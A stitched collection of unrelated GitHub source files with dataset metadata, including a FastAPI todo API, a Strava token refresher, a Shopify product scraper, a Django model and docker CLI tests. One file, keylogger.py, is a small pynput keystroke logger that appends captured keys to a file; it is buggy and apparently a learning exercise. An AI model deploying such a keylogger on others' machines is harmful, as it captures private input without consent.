answer[i][m - 1] = data[i][m - 1]
queue.append((i,m-1))
while queue:
#print(answer)
x,y = queue.popleft()
for i in range(3):
nx = x + dx[i]
ny = y + dy[i]
if 0<=nx<n and 0<=ny<m and answer[nx][ny] < answer[x][y] + data[nx][ny]:
answer[nx][ny] = answer[x][y]+data[nx][ny]
queue.append((nx,ny))
max = 0
for i in range(n):
if max < answer[i][0]:
max = answer[i][0]
print(max)
# 책에서 푼 방법
# 테스트 케이스(Test Case) 입력
# for tc in range(int(input())):
# n,m = map(int,input().split())
# array = list(map(int,input().split()))
#
# # 다이나믹 프로그래밍을 위한 2차원 DP 테이블 초기화
# dp = []
# index = 0
# for i in range(n):
# dp.append(array[index:index+m])
# index += m
#
# # 다이나믹 프로그래밍 진행
# for j in range(1,m):
# for i in range(n):
# print(dp)
# # 왼쪽 위에서 오는 경우
# if i == 0:
# left_up = 0
# else:
# left_up = dp[i-1][j-1]
# # 왼쪽 아래에서 오는 경우
# if i == n-1:
# left_down = 0
# else:
# left_down = dp[i+1][j-1]
# # 왼쪽에서 오는 경우
# left = dp[i][j-1]
# dp[i][j] = dp[i][j] + max(left_up, left_down, left)
#
#
# result = 0
# for i in range(n):
# result = max(result,dp[i][m-1])
#
# print(result)
# 2
# 3 4
# 1 3 3 2 2 1 4 1 0 6 4 7
# 4 4
# 1 3 1 5 2 2 4 1 5 0 2 3 0 6 1 2 | Girin7716/PythonCoding | pythonBook/Problem Solving/Q31.py | Q31.py | py | 2,169 | python | ko | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
}
] |
71929274985 | from fastapi import FastAPI, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from model import Todo
app = FastAPI()
from database import(
fetchOneTodo,
fetchAllTodos,
createTodo,
updateTodo,
removeTodo,
)
origins = ['http://localhost:3000', 'http://localhost:4000']
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials= True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get("/")
def read_root():
return {"Hello":"Kiki"}
@app.get("/api/todo")
async def get_todo():
response = await fetchAllTodos()
return response
@app.get("/api/todo/{title}", response_model=Todo)
async def get_todo_by_id(title):
response = await fetchOneTodo(title)
if response:
return response
raise HTTPException(404,f"No Todo Item by that {title}")
# Create
@app.post("/api/todo/", response_model=Todo)
async def post_todo(todo:Todo):
response = await createTodo(todo.dict())
if response:
return response
raise HTTPException(400,"Something went wrong. Bad Request")
# Update
@app.put("/api/todo/{title}/", response_model=Todo)
async def put_todo(title:str, desc:str):
response = await updateTodo(title, desc)
if response:
return response
raise HTTPException(404, f"No Todo Item by that {title}")
# Delete
@app.delete("/api/todo/{title}")
async def delete_todo(title):
response = await removeTodo(title)
if response:
return "Deleted todo item"
raise HTTPException(404, f"There is no TODO item with title {title}")
'''
Can run the server with command below
uvicorn main:app --reload --port 4000
''' | coronel08/farm-stack-todo | backend/main.py | main.py | py | 1,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "fastapi.middleware.cors.CORSMiddleware",
"line_number": 18,
"usage_type": "argument"
},
{
"api_name": "database.fetchAllTodos",
"line_number": 32,
"usage_type": "call"
},
{
"... |
7075228208 | """Strava API key update.
:authors
JP at 17/04/20
"""
from google.cloud import firestore
import logging
import requests
import time
db = firestore.Client()
collection = db.collection('strava')
class RefreshTokenBadRequest(Exception):
"""Expection for an invalid request to Strava to get a new token."""
pass
def refresh_key(event, context):
"""Triggered from a message on a Cloud Pub/Sub topic. Update Strava keys stored in Firestore."""
for doc in collection.stream():
data = doc.to_dict()
logging.info(f'got key {doc.id}')
if time.time() < data['expires_at']:
logging.info(f'expiry time {data["expires_at"]} not greater than current {time.time()}')
continue
else:
logging.info(f'expiry time {data["expires_at"]} greater than current so getting a new access token')
request_params = {'client_id': data['client_id'],
"client_secret": data['client_secret'],
"grant_type": "refresh_token",
"refresh_token": data['refresh_token']}
response = requests.post("https://www.strava.com/api/v3/oauth/token", params=request_params)
logging.info(f'made request to Strava and got response code {response.status_code}')
if response.status_code != 200:
logging.error(f'Bad request {response.status_code} content {response.text}')
raise RefreshTokenBadRequest
response_dict = response.json()
update_doc = collection.document(doc.id)
update_doc.update({'access_token': response_dict['access_token'],
'refresh_token': response_dict['refresh_token'],
'expires_at': response_dict['expires_at']})
logging.info(f'updated {doc.id} with new expiry time {response_dict["expires_at"]}')
| j-penson/strava-leaderboards | functions/strava_key/main.py | main.py | py | 1,886 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "google.cloud.firestore.Client",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "google.cloud.firestore",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "logging.info",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "tim... |
10773542334 | import sqlite3
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
'''
This is a simple tool i made to create a plot graph with the data from the database. You can
manually enter the prefix's of the companys you want to look at in the prefix_list and it
will use all the data it can in the database corresponding to that prefix. This tool is used
to determine the sentiment score and volume over a chosen period of time.
'''
# Set the period of time you want to analyse - in days
time_period = 20
# Dates
date = datetime.datetime.today()
#date = date - datetime.timedelta(days=time_period)
past_date = date - datetime.timedelta(days=time_period)
conn = sqlite3.connect('Cobalt_Blue.db')
c = conn.cursor()
def select_scraped_data(prefix):
c.execute("SELECT post_date, sentiment, price FROM Scraped_data WHERE company=?", (prefix,))
data = c.fetchall()
return data
# Set companys to graph by prefix eg COB
prefix_list = ['4DS']
# Loop through company prefix
graph = True
previous_item = [past_date]
for prefix in prefix_list:
try:
print("Analysing: " + prefix + " for past " + str(time_period) + " days")
data = select_scraped_data(prefix)
# Declaring x,y coord variables for graph
x = []
y = []
x2 = []
y2 = []
# Converting to datestamp to sort by date
date_data = []
clean_data = []
for item in data:
item = list(item)
item[0] = datetime.datetime.strptime(item[0], "%d/%m/%y")
date_data.append(item)
# Sorting dates and saving wanted dates in new list.
date_data.sort()
for item in date_data:
if item[0] > past_date:
clean_data.append(item)
# Getting volume and sentiment
volume, sentiment = 0, 0
buy, sell, hold, none = 0, 0, 0, 0
for item in clean_data:
print(item)
volume += 1
if item[1] == 'Buy':
buy += 1
sentiment += 1
elif item[1] == 'Sell':
sell += 1
sentiment -= 1
elif item[1] == 'Hold':
hold += 1
if sentiment > 1:
sentiment -= 1
elif sentiment < -1:
sentiment += 1
elif item[1] == 'None':
none += 1
# Sorting dates to plot only end of day figure and decaying sentiment for time without posts.
if item[0] > previous_item[0]:
#print(item)
# Finding days between posts and decaying sentiment at 0.25/day if no post.
sent_decay = item[0] - previous_item[0]
sent_decay = str(sent_decay)
sent_decay = sent_decay[0:2]
sent_decay = int(sent_decay)
sent_decay = sent_decay/4
print(sent_decay)
if sentiment > 1 and sent_decay > 0.25:
if sentiment >= sent_decay:
sentiment -= sent_decay
else:
sentiment = 0
# Converting date format for graphing and appending to coords.
new_date = item[0].strftime('%d-%m-%Y')
x.append(new_date)
x2.append(new_date)
y.append(sentiment)
y2.append(item[2])
previous_item = item
# Buy/sell ratio
ratio = ((buy - sell) / (buy + sell + hold + none))*100
ratio = round(ratio, 2)
# Volume ratio
volume_ratio = round(volume / time_period, 1)
print("Volume: " + str(volume))
print("Buy: " + str(buy))
print("Sell: " + str(sell))
print("Hold: " + str(hold))
print("None: " + str(none))
print("Buy strength: " + str(ratio) + "%")
print("Volume Strength: " + str(volume_ratio) + " posts per day")
print("Sentiment Score: " + str(sentiment))
ratio = 0
volume_ratio = 0
except Exception as e:
print("Error - No data in that time period!")
print(e)
graph = False
print()
if graph:
# Setting graph format - change between months/days and set fmt to %m or %d
#months = mdates.MonthLocator()
days = mdates.DayLocator()
fmt = mdates.DateFormatter('%d')
# Converting back to datetime to graph
x = [datetime.datetime.strptime(d,'%d-%m-%Y').date() for d in x]
x2 = [datetime.datetime.strptime(d,'%d-%m-%Y').date() for d in x2]
# Plotting coords
fig, ax = plt.subplots()
ax2 = ax.twinx()
ax.plot(x, y, label='Sentiment', color='r')
ax.set_xlabel('Time (days)')
ax.set_ylabel('Sentiment Score')
ax2.plot(x2, y2, label='Price', color='b')
ax2.set_ylabel("Price at Post")
# Getting legends for graph
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, loc='center left')
# Setting x axis format
ax.xaxis.set_major_locator(days)
ax.xaxis.set_major_formatter(fmt)
# Graphing info
plt.title(str(prefix) + ' Sentiment')
plt.legend()
plt.show()
# Closing database connections
c.close()
conn.close() | Barrenjoey/Company-Sentiment-Project | Graph.py | Graph.py | py | 4,618 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.today",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sql... |
21539613759 | from pynput import keyboard
# Defines a function for the keylogger
def keyPressed(key):
print(str(key))
with open("keyfile.text",'a') as logKey:
try:
char = key.char
logKey.write()
except:
print("Error getting char")
if __name__ == "__main__":
listener = keyboard.Listener(on_press=keyPressed)
listener.start()
input() | Roscalion/cybersecuritykeylogger | keylogger.py | keylogger.py | py | 410 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pynput.keyboard.Listener",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pynput.keyboard",
"line_number": 15,
"usage_type": "name"
}
] |
39467758886 | import errno
import sqlite3
import os
from mdde_stats.service.data import Benchmark
class LocalDataManager:
def __init__(self, data_dir: str):
"""
Constructor
:param data_dir: path to directory where database should be stored
"""
if data_dir is None:
raise TypeError('data_dir path was not supplied')
self._db_name = 'mdde_stats.db'
self._data_dir = os.path.abspath(data_dir)
try:
# Create date folder if not exists
os.makedirs(self._data_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
self._full_path = os.path.join(self._data_dir, self._db_name)
self._connection = None
def initialize_db(self, db_file: str = None):
"""
Initialize the local db
:param db_file: (optional) Name of the database file. If not specified, default name is used
:return:
"""
if db_file is not None:
if db_file.isspace():
raise ValueError("db_file must be a valid file name")
self._db_name = db_file
self._full_path = os.path.join(self._data_dir, self._db_name)
self._make_schema()
@property
def db_location(self) -> str:
"""
Get location of the database file
:return: String with full path to the database
"""
return self._full_path
TABLE_LOGS = 'logs'
def _make_schema(self):
"""
Create schema if needed
"""
conn = sqlite3.connect(self.db_location)
try:
with conn:
c = conn.cursor()
logs_create_q = 'CREATE TABLE IF NOT EXISTS logs (' \
'run_id TEXT NOT NULL, ' \
'node_id TEXT, ' \
'tuple_id TEXT, ' \
'source TEXT, ' \
'operation INTEGER NOT NULL, ' \
'epoch DATETIME ' \
');'
logs_run_idx_create_q = 'CREATE INDEX IF NOT EXISTS run_idx ON logs (run_id);'
logs_run_node_create_q = 'CREATE INDEX IF NOT EXISTS run_node ON logs (node_id);'
c.execute(logs_create_q)
c.execute(logs_run_idx_create_q)
c.execute(logs_run_node_create_q)
finally:
conn.close()
def flush(self):
"""
Flush all records from the database leaving schema intact
:return:
"""
conn = sqlite3.connect(self.db_location)
try:
with conn:
c = conn.cursor()
c.execute('DELETE FROM {};'.format(self.TABLE_LOGS))
finally:
conn.close()
def __enter__(self) -> Benchmark:
if self._connection is not None:
raise RuntimeError("There is already an open connection")
self._connection = sqlite3.connect(self.db_location)
return Benchmark(self._connection)
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None:
self._connection.rollback()
else:
self._connection.commit()
self._connection.close()
self._connection = None
| jcridev/mdde | stats-processor/src/mdde_stats/service/data/manager.py | manager.py | py | 3,347 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "errno.EEXIST",
"line_num... |
22773409160 | # -*- coding:utf-8 -*-
"""
Pour éviter de surcharger de commandes le drone.
"""
from vector import Vector
class Queue (object):
"""
Permet de moduler le flux de commandes à donner au drone, en moyennant les vecteurs déplacement successifs sur plusieurs frames.
"""
def __init__(self, drone, cmd_max):
self.queue = []
self.processed = []
self.drone = drone
self.opposed = {self.drone.forward : self.drone.backward,
self.drone.backward : self.drone.forward,
self.drone.left : self.drone.right,
self.drone.right : self.drone.left,
self.drone.down : self.drone.up,
self.drone.up : self.drone.down,
self.drone.rLeft : self.drone.rRight,
self.drone.rRight : self.drone.rLeft}
self.count = 0
self.cmd_max = cmd_max
def flush(self):
"""
Envoie les commandes intelligemment : somme les vecteurs déplacement pour améliorer la précision des déplacements.
"""
#Vecteur représentant le pointage moyen sur plusieurs frames
sum_vector = Vector(0,0,0)
for vector in self.queue:
sum_vector += vector
sum_vector /= self.count
self.drone.processVector(sum_vector)
self.empty()
def empty(self):
self.queue = []
self.count = 0
def add(self, offset):
self.queue.append(Vector(offset[0], offset[1], offset[2]))
self.count+=1
def check(self):
if self.count >= self.cmd_max:
self.flush()
| micronoyau/NSA-Drone | queue.py | queue.py | py | 1,609 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "vector.Vector",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "vector.Vector",
"line_number": 48,
"usage_type": "call"
}
] |
32932643233 | from django.db import models
# from address.models import AddressField
from django import forms
# from django_google_maps import fields as map_fields
from Location.models import Address
from django.utils.html import mark_safe
from django.conf import settings
from django.db.models import Avg
from decimal import *
class ImageUploadForm(forms.Form):
"""Image upload form."""
image = forms.ImageField()
class Restaurant(models.Model):
name = models.CharField(max_length=42)
newfields = models.CharField(max_length=42, null=True, blank=True)
restaurant_address = models.CharField("Address", max_length=42, null=True, blank=True)
email = models.EmailField(max_length=75, blank=True)
website = models.URLField(max_length=200, null=True, blank=True)
content = models.TextField()
created_on = models.DateTimeField(auto_now_add=True)
# banner_image = models.ImageField(upload_to='restaurant/images/', default='restaurant/images/None/no-img.jpg')
# logo = models.ImageField(upload_to='restaurant/images/', default='restaurant/images/None/no-img.jpg')
restaurant_banner_image = models.ImageField("Banner Image", upload_to='restaurant/images/',blank=True)
restaurant_logo = models.ImageField("Logo", upload_to='restaurant/images/',blank=True)
# owner = models.ForeignKey('auth.User', related_name='restaurant_owner', editable=False, on_delete=models.CASCADE)
owner = models.ForeignKey('auth.User', related_name='restaurant_owner', on_delete=models.CASCADE)
address = models.OneToOneField(Address, null=True, related_name='restaurants', on_delete=models.CASCADE)
# address = map_fields.AddressField(max_length=200, null=True, blank=True)
# geolocation = map_fields.GeoLocationField(max_length=100, null=True, blank=True)
# from django_google_maps import fields as map_fields
# follower = models.ManyToManyField('auth.User', blank=True)
# address1 = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'id': "autocomplete"}))
# address2 = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'id': "autocomplete"}))
# address1 = AddressField(blank=True, null=True)
# address2 = AddressField(related_name='+', blank=True, null=True)
# highlighted = models.TextField()
def restaurant_logo_tag(self):
return mark_safe('<img class="user-image img-circle" src="%s%s" width="80" height="80" />' % (settings.MEDIA_URL , self.restaurant_logo))
restaurant_logo_tag.short_description = 'Restaurant Logo'
# def average_rating(self):
# # breakpoint()
# avg = self.reviews.aggregate(Avg('rating'))
# breakpoint()
# return Decimal(avg)
def __str__(self):
return self.name
class Meta:
ordering = ['created_on']
# permissions = (
# ('read_item','Can read item'),
# )
| chandra10207/food_delivery | restaurant/models.py | models.py | py | 2,868 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "django.forms.ImageField",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "django.fo... |
70679148583 | import sys
import csv
import json
import time
import urllib.request
from urllib.error import HTTPError
from optparse import OptionParser
import argparse
def get_page(url, page, collection_handle=None):
full_url = url
if collection_handle:
full_url += '/collections/{}'.format(collection_handle)
full_url += '/products.json'
req = urllib.request.Request(
full_url + '?page={}'.format(page),
data=None,
)
while True:
try:
data = urllib.request.urlopen(req).read()
break
except HTTPError:
print('Blocked! Sleeping...')
time.sleep(180)
print('Retrying')
products = json.loads(data.decode())['products']
return products
def get_page_collections(url):
full_url = url + '/collections.json'
page = 1
while True:
req = urllib.request.Request(
full_url + '?page={}'.format(page),
data=None,
)
while True:
try:
data = urllib.request.urlopen(req).read()
break
except HTTPError:
print('Blocked! Sleeping...')
time.sleep(180)
print('Retrying')
cols = json.loads(data.decode())['collections']
if not cols:
break
for col in cols:
yield col
page += 1
def check_shopify(url):
try:
get_page(url, 1)
return True
except Exception:
return False
def fix_url(url):
fixed_url = url.strip()
if not fixed_url.startswith('http://') and \
not fixed_url.startswith('https://'):
fixed_url = 'https://' + fixed_url
return fixed_url.rstrip('/')
def extract_products_collection(url, col,template):
page = 1
products = get_page(url, page, col)
while products:
for product in products:
title = product['title']
product_type = product['product_type']
product_url = url + '/products/' + product['handle']
product_handle = product['handle']
def get_image(variant_id):
images = product['images']
for i in images:
k = [str(v) for v in i['variant_ids']]
if str(variant_id) in k:
return i['src']
return ''
for i, variant in enumerate(product['variants']):
price = variant['price']
option1_value = variant['option1'] or ''
option2_value = variant['option2'] or ''
option3_value = variant['option3'] or ''
option_value = ' '.join([option1_value, option2_value,
option3_value]).strip()
sku = variant['sku']
main_image_src = ''
if product['images']:
main_image_src = product['images'][0]['src']
image_src = get_image(variant['id']) or main_image_src
stock = 'Yes'
if not variant['available']:
stock = 'No'
metafields = product['metafields'] if "metafields" in product else []
row = {
'sku': sku, 'product_type': product_type,
'title': title, 'option_value': option_value,
'price': price, 'stock': stock, 'body': str(product['body_html']),
'variant_id': product_handle + str(variant['id']),
'product_url': product_url, 'image_src': image_src , "metafields" : metafields
}
row.update(product)
for k in row:
row[k] = str(str(row[k]).strip()) if row[k] else ''
if template == BASE_TEMPLATE or template == GOOGLE_TEMPLATE:
yield {'row': row}
else : yield {'product':product,'variant': variant,
'row': row
}
page += 1
products = get_page(url, page, col)
def extract_products(url, path, collections=None ,delimiter = "\t" , template = False):
tsv_headers = get_headers(template)
with open(path, 'w', newline='') as f:
writer = csv.writer(f,delimiter=delimiter)
# writer.writerow(tsv_headers)
seen_variants = set()
metafields_len = 0
rows_data = []
attributes_count = 3
try:
for col in get_page_collections(url):
if collections and col['handle'] not in collections:
continue
handle = col['handle']
title = col['title']
for product in extract_products_collection(url, handle,template):
if template != ELLIOT_TEMPLATE_1:
variant_id = product['row']['variant_id']
if variant_id in seen_variants:
continue
seen_variants.add(variant_id)
images = json.loads(product['row']["images"].replace("'", '"'))
images = [x["src"].split("?")[0] for x in images[1:]]
if template == BASE_TEMPLATE:
if( len(product['row']['metafields']) > metafields_len ):
for index in range( len(product['row']['metafields']) - metafields_len ):
tsv_headers.append("MetaField%i"%(metafields_len+index+1))
metafields_len = len(product['row']['metafields'])
if template == GOOGLE_TEMPLATE or template == BASE_TEMPLATE:
ret,b = format_row_data(template , product['row'],images, title)
else:
ret,b = format_row_data(template , product,[], title)
if b:
for i in ret:
rows_data.append(i)
else:
rows_data.append(ret)
except Exception as e:
writer.writerow(tsv_headers)
for row in rows_data :
writer.writerow(row)
exit()
writer.writerow(tsv_headers)
for row in rows_data :
writer.writerow(row)
def get_headers(TEMPLATE, attribute_count = 3):
if TEMPLATE == GOOGLE_TEMPLATE:
tsv_headers = ['Code','Collection','Category','Name','Variant Name','Price','In Stock','URL','Image URL','Body','id','title','GTIN','brand','product_name','product_type','description','image_link','additional_image_link','product_page_url','release_date','disclosure_date','suggested_retail_price']
else:
# TEMPLATE == BASE_TEMPLATE:
tsv_headers = ['Code', 'Collection', 'Category','Name', 'Variant Name','Price', 'In Stock', 'URL', 'Image URL', 'Body']
return tsv_headers
def format_row_data(TEMPLATE ,product,images,title):
if TEMPLATE == GOOGLE_TEMPLATE:
# 'Code', 'Collection','Category', 'Name', 'Variant Name', 'Price', 'In Stock', 'URL', 'Image URL', 'Body', 'id', 'title', 'GTIN', 'brand', 'product_name', 'product_type', 'description', 'image_link','additional_image_link','product_page_url','release_date','disclosure_date','suggested_retail_price'
return ([ product['sku'], str(title), product['product_type'], product['title'], product['option_value'], product['price'], product['stock'], product['product_url'], product['image_src'], product['body'], product['id'], product['title'], product['sku'], product['vendor'], product['title'], product['product_type'], product['body_html'], product['image_src'], ",".join(images), product['product_url'], product['created_at'][0:10], product['created_at'][0:10], product['price'] ],False)
else:
return ([ product['sku'], str(title), product['product_type'], product['title'], product['option_value'], product['price'], product['stock'], product['product_url'], product['image_src'], product['body'] ] + [x for x in product['metafields']],False)
def format_unit_weight(w):
if w.lower() == "ounces" or w.lower()=="oz":
return "OZ"
if w.lower() == "grams" or w.lower()=="g":
return "G"
if w.lower() == "pounds" or w.lower()=="lb":
return "LB"
if w.lower() == "kilograms" or w.lower()=="kg":
return "KG"
else:
return "LB"
def get_product_row(i,metafields):
quantity = i['inventory_quantity'] if 'inventory_quantity' in i else '1'
weight = ''
unit_of_weight = ''
seo_title = ''
seo_desc = ''
if 'grams' in i :
unit_of_weight = 'grams'
weight = i['grams']
if 'weight_unit' in i:
unit_of_weight = i['weight_unit']
weight = i['weight']
for meta in metafields:
if meta == 'metafields_global_title_tag':
seo_title = metafields[meta]
if meta == 'metafields_global_description_tag':
seo_desc = metafields[meta]
if 'name' in meta and meta['name'] == 'metafields_global_title_tag':
if 'value' in meta:
seo_title = meta['value']
else:
seo_title = str(meta)
if 'name' in meta and meta['name'] == 'metafields_global_description_tag':
if 'value' in meta:
seo_desc = meta['value']
else:
seo_desc = str(meta)
if 'variants' in i:
if len(i['variants']) >= 1:
k = i['variants'][0]
if 'grams' in k :
unit_of_weight = 'grams'
weight = k['grams']
if 'weight_unit' in k:
unit_of_weight = k['weight_unit']
weight = k['weight']
base_price = k['compare_at_price'] if 'compare_at_price' in k else ''
if(base_price == '' or base_price==None): base_price = k['price'] if 'price' in k else ''
sale_price = k['price'] if base_price!='' else ''
try:
if(base_price != '' and sale_price != '' and float(base_price) < float(sale_price)):
tmp_var = sale_price
sale_price = base_price
base_price = tmp_var
except Exception as e:
pass
if sale_price == base_price:
sale_price = ''
return [ base_price, sale_price , quantity , format_unit_weight(unit_of_weight) , weight if weight else '1' , "IN" , "3" , "3" , "3" ,seo_title,seo_desc ]
else:
base_price = i['compare_at_price'] if 'compare_at_price' in i else ''
if(base_price == '' or base_price==None): base_price = i['price'] if 'price' in i else ''
sale_price = i['price'] if base_price!='' else ''
try:
if(base_price != '' and sale_price != '' and float(base_price) < float(sale_price)):
tmp_var = sale_price
sale_price = base_price
base_price = tmp_var
except Exception as e:
pass
if sale_price == base_price:
sale_price = ''
return [ base_price, sale_price , quantity , format_unit_weight(unit_of_weight) , weight if weight else '1' , "IN" , "3" , "3" , "3" ,seo_title,seo_desc ]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--list-collections' , dest="list_collections" , action="store_true" , help="List collections in the site")
parser.add_argument("--collections" , "-c" , dest="collections" , default="" , help = "Download products only from the given collections")
parser.add_argument("--csv", dest="csv" , action="store_true" , help="Output format CSV ")
parser.add_argument("--tsv", dest="tsv" , action="store_true" , help="Output format TSV" )
parser.add_argument("--google-manufacturer" , action="store_true" , help="Output google-manufacturer template")
parser.add_argument("--base-feed" , action="store_true" , help="Output original Shopify template")
# constants to avoid string literal comparison
BASE_TEMPLATE = 0
GOOGLE_TEMPLATE = 1
ELLIOT_TEMPLATE = 2
ELLIOT_TEMPLATE_1 = 3
(options,args) = parser.parse_known_args()
delimiter = "\t" if options.tsv else ','
if len(args) > 0:
url = fix_url(args[0])
if options.list_collections:
for col in get_page_collections(url):
print(col['handle'])
else:
collections = []
if options.collections:
collections = options.collections.split(',')
filename = 'products.tsv' if options.tsv else 'products.csv'
if options.google_manufacturer:
extract_products(url, filename, collections , delimiter , GOOGLE_TEMPLATE)
elif not options.base_feed:
extract_products(url, filename, collections , delimiter , GOOGLE_TEMPLATE)
else:
extract_products(url, filename, collections , delimiter , BASE_TEMPLATE) | gilloglym/ShopifyWebScraper | shopify_scraper.py | shopify_scraper.py | py | 13,303 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urllib.request.request.Request",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 15,
"usage_type": "name"
},
{
"api_nam... |
74059837544 | import warnings
import configparser
from pathlib import Path
from typing import List, NamedTuple, Optional
FileConfiguration = NamedTuple(
"FileConfiguration",
[
("project", Optional[str]),
("remote", Optional[str]),
("server", Optional[str]),
("ignore", List[str]),
],
)
def _empty_file_configuration():
return FileConfiguration(None, None, None, [])
def _read_ignore_patterns(ignore_string: str) -> List[str]:
return [s.strip() for s in ignore_string.split(",") if s.strip()]
def _create_parser():
converters = {"list": _read_ignore_patterns}
return configparser.ConfigParser(converters=converters)
def _resolve_user_conf_path(user_conf_path=None):
if user_conf_path is None:
user_conf_path = Path.home() / ".config/faculty-sync/faculty-sync.conf"
if not user_conf_path.exists():
user_conf_path = Path.home() / ".config/sml-sync/sml-sync.conf"
if user_conf_path.exists():
warnings.warn(
"Reading configuration from ~/.config/sml-sync/sml-sync.conf. "
"This path is deprecated. "
"Use ~/.config/faculty-sync/faculty-sync.conf."
)
return user_conf_path
def _resolve_project_conf_path(directory, project_conf_path=None):
if project_conf_path is None:
project_conf_path = directory / ".faculty-sync.conf"
if not project_conf_path.exists():
project_conf_path = directory / ".sml-sync.conf"
if project_conf_path.exists():
warnings.warn(
"Reading configuration from .sml-sync.conf. "
"This file is deprecated. Use .faculty-sync.conf."
)
return project_conf_path
def get_config(
local_directory: str, project_conf_path=None, user_conf_path=None
) -> FileConfiguration:
"""
Parse a faculty-sync.conf file.
The function first checks in the passed directory, and if it doesn't
find a configuration file, checks if there is one in the user directory.
"""
directory = Path(local_directory).expanduser().resolve()
user_conf_path = _resolve_user_conf_path(user_conf_path)
project_conf_path = _resolve_project_conf_path(
directory, project_conf_path
)
config = _create_parser()
try:
with user_conf_path.open() as fp:
config.read_file(fp)
# "normalise" the paths to avoid issues with symlinks and ~
config.read_dict(
{
str(Path(key).expanduser()).rstrip("/"): value
for key, value in config.items()
if key.lower() != "default"
and not config.has_section(
str(Path(key).expanduser()).rstrip("/")
)
}
)
except FileNotFoundError:
pass
try:
project_config = _create_parser()
with project_conf_path.open() as fp:
project_config.read_file(fp)
if len(project_config.sections()) > 1:
raise ValueError(
"The project config file is ambiguous, as it has "
"more than two sections."
)
elif len(project_config.sections()) == 1:
if str(directory) in config:
raise ValueError(
"You can't specify configurations for a "
"project in both the home and project "
"directory."
)
config.read_dict(
{
str(directory): project_config[
project_config.sections()[0]
]
}
)
except FileNotFoundError:
pass
if str(directory) in config:
section = config[str(directory)]
ignore = section.getlist("ignore")
if ignore is None:
ignore = []
parsed_configuration = FileConfiguration(
project=section.get("project"),
remote=section.get("remote"),
server=section.get("server"),
ignore=ignore,
)
else:
parsed_configuration = _empty_file_configuration()
return parsed_configuration
| facultyai/faculty-sync | faculty_sync/cli/config.py | config.py | py | 4,382 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "typing.NamedTuple",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "typing.Optional",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
... |
5054290299 | import os
import papermill as pm
def train_ct(dataset_name, hampel_window_len, num_sigmas):
input = "constant-threshold.ipynb"
output = "out/constant-threshold-" + dataset_name + ".ipynb"
pm.execute_notebook(input, output, parameters = dict(
dataset_name = dataset_name,
hampel_window_len = hampel_window_len,
num_sigmas = num_sigmas
))
def train_all(num_datasets, hampel_window_len, num_sigmas):
for i in range(0, num_datasets):
name = "wn-" + ("00" + str(i))[-3:]
train_ct(name, hampel_window_len, num_sigmas)
i = i + 1
dir = "./out"
if not os.path.exists(dir):
os.mkdir(dir)
# Different training params
#train_all(10, 5, 2)
train_all(10, 5, 3)
#train_all(10, 5, 4)
| williewheeler/time-series-demos | papermill/train-all.py | train-all.py | py | 744 | python | en | code | 18 | github-code | 36 | [
{
"api_name": "papermill.execute_notebook",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
... |
21885227488 | """
Tests brewblox_ctl.commands.docker
"""
import pytest
from brewblox_ctl.commands import docker
from brewblox_ctl.testing import check_sudo, invoke
TESTED = docker.__name__
@pytest.fixture
def m_utils(mocker):
m = mocker.patch(TESTED + '.utils', autospec=True)
m.optsudo.return_value = 'SUDO '
return m
@pytest.fixture
def m_sh(mocker):
m = mocker.patch(TESTED + '.sh', autospec=True)
m.side_effect = check_sudo
return m
def test_up(m_utils, m_sh):
invoke(docker.up, '--quiet svc')
m_sh.assert_called_once_with('SUDO docker compose up -d --quiet svc')
m_sh.reset_mock()
invoke(docker.up, '-d --quiet svc')
m_sh.assert_called_once_with('SUDO docker compose up -d --quiet svc')
def test_down(m_utils, m_sh):
invoke(docker.down, '--quiet')
m_sh.assert_called_once_with('SUDO docker compose down --quiet')
def test_restart(m_utils, m_sh):
invoke(docker.restart, '--quiet svc')
m_sh.assert_called_once_with('SUDO docker compose up -d --force-recreate --quiet svc')
def test_follow(m_utils, m_sh):
invoke(docker.follow, 'spark-one spark-two')
m_sh.assert_called_with('SUDO docker compose logs --follow spark-one spark-two')
